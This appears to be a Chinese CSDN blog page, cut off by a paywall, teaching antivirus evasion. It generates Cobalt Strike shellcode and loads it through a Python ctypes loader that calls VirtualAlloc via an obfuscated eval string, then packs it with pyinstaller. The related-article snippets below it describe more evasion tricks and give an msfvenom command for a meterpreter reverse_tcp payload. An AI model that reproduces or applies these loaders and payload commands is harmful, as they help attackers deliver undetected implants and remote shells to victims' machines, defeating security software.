cs免杀-使用python进行免杀

最新推荐文章于 2024-09-02 20:37:59 发布
最新推荐文章于 2024-09-02 20:37:59 发布
阅读量1.9k 收藏 4
点赞数 1
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53087192/article/details/113756320
版权
本文介绍了如何在Python3.6 32位环境下,利用CobaltStrike生成C语言shellcode,通过shellcode loader进行加载并采用加密等免杀技术,最后使用pyinstaller打包成可执行文件,实现渗透测试中的免杀目标。
摘要由CSDN通过智能技术生成

环境

使用python版本为python3.6 32位版本,64位版本测试会报错。
安装pyinstaller,pywin32

pip3 install pyinstaller
pip3 install pywin32

生成shellcode

使用cobalsstrike生成c语言shellcode。
在这里插入图片描述
在这里插入图片描述

使用shellcode loader加载shellcode

#!/usr/bin/python3
import ctypes

#shellcode 放这个位置
c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89";


shellcode = bytearray(c)

a = 'ctypes.windll.' + 'kernel32.VirtualAlloc'
ptr = eval(a)(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
最低0.47元/天 解锁文章
amd6700k
关注
2024年Python最新【免杀】分离免杀python)_shellcode loader免杀
2401_84585462的博客
05-01 462
import sysf.close()loader加密。
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
Python免杀
weixin_43526443的博客
08-03 2382
Somethingu have to know: 本Python脚本构建简易的http请求及响应,可通过服务端调用客户端CMD执行命令(可在客户端内置便捷指令 )。 同时,脚本使用了PyInstaller,将python解释器及第三方模块进行打包成可执行文件。 经测试可免杀绝大多数杀软。 0x01 环境准备 pip install requests(用于发送请求) pip install pyscreenshot...
木马免杀处理
最新发布
weixin_58666006的博客
09-02 996
木马免杀,脚本型木马和二进制型木马
python免杀
weixin_43152809的博客
07-13 730
最近学习的过程中,发现python的匿名函数很适合用于免杀python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
免杀学习(二)python
m0_62207170的博客
01-09 607
python免杀
渗透测试笔记】之【Python免杀——两行代码免杀。VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)】
AA8j的博客
10-24 5965
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查杀率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离后shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查杀率:1
免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
xiaoheizi的博客
09-13 1277
1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。
python3内存加载cs shellcode实现免杀
None安全团队
12-03 2106
前言: 最近看到很多利用加载器来加载shellcode来实现免杀的思路,前段时间本公众号还推了一个j0师傅的golang加载器,大家用了过后是不是感觉效果都不错?今天本文来利用python来作为加载器来实现免杀的效果。 先说说效果: 经本地测试免杀360全家桶+火绒。 当然免杀的不止这些,其余的没有本地测试,放微步、vs、vt等平台上去跑了。 微步检出率(3/25) vs检出率(4/49) vt检出率(16/69) 从上述检测结果来看,国内主流的...
Python反序列化免杀上线CS:两次编码绕过
Miracle_ze的博客
08-21 2201
如果在测试中出现crypto问题,是因为在使用python是经常会用到import一个第三方库,但是有时候会提示某个模块不存在,如Crypto其实是因为Python3里面这个模块的名字变了。这里的编码是我们上传了服务器已经编码过一次的内容进行了的反序列化,对反序列化后的内再次base64编码。编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次。此时加密后输入的加密格式是base64格式,为此要解密前需要先base64解密再进行AES解密。在文件内容加入反序列化结果。
python制作免杀软件教程及工具.zip
07-26
本资源会教你如何用python制作免杀软件,并提供了所需的代码工具和脚本,亲测能够过360安全卫士和火绒。
Python shellcode免杀
qq_25761407的博客
04-02 5616
Python shellcode免杀
Python免杀入门学习
Fighter安全
04-23 2105
这里主要针对国内主流三大杀软进行免杀测试,python语法简单,开发效率高,适合入门学习,而且免杀效果也还不错。当然免杀是具有时效性的,文章的方法主要记录一下免杀思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11杀毒软件:360杀毒(全引擎) + 火绒 + Windows Defender。
Python免杀火绒、360和Defender
热门推荐
江左盟的博客
10-10 2万+
目录 简介 环境 原理 加载ShellCode 定位特征码 Base64编码绕过 简介 之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的免杀方法,最近学习并实践发现绕过国内的杀毒软件貌似并不难,本文使用手工分析特征码,使用base64编码绕过杀毒软件静态分析。虽然使用的方法比较简单,但对实际做免杀免杀研究还是有一定意义的。 环境 Windows 10 x64 Python 3.8.3 Pyinstaller 火绒版本:5.0..
python免杀学习
m0_58595840的博客
01-06 460
python免杀bypass学习
python 加密_python字符加密免杀
weixin_39564755的博客
12-07 386
目前传统的或网上以公开的免杀方式几乎都不免杀了(见光死),所以本次免杀方式也只是分享一下思路,如果后面不免杀了再改改就可以了这里使用的是python加载shellcode,原始的shellcode加载源码如下:importctypesshellcode=b"这里是生成的shellcode"#设置函数VirtualAlloc的返回类型为c_int64ctypes.windll.kerne...
python免杀基础——三步(查杀、连接、代码)情况
渗透测试
11-14 2043
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程。调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;本次使用msf生成的shellcode。本次使用msf生成的shellcode。连接和上次一样,秒连。
python学习笔记——pythonexe免杀
小橙子的博客
07-07 969
思路: 将敏感代码转码,使用时解码再执行。 参考: https://blog.csdn.net/qq_32261191/article/details/108994177 一、敏感代码使用base64编码 #-*- coding: utf-8 -*- import base64 str = """ print('123') """ #编码 encode = base64.b64encode(str.encode('utf-8')) print(encode) 结果: b'CnByaW50
CS2676CX-1绝缘电阻测试仪安全操作与使用指南
"CS2676CX-1绝缘电阻测试仪是南京长盛生产的设备,用于进行绝缘电阻测量,其系列包括CS2676CX和CS9901,最高可输出1kV电压。使用前必须详细阅读安全注意事项,确保操作正确,以防发生死亡事故。说明书应随时可供操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值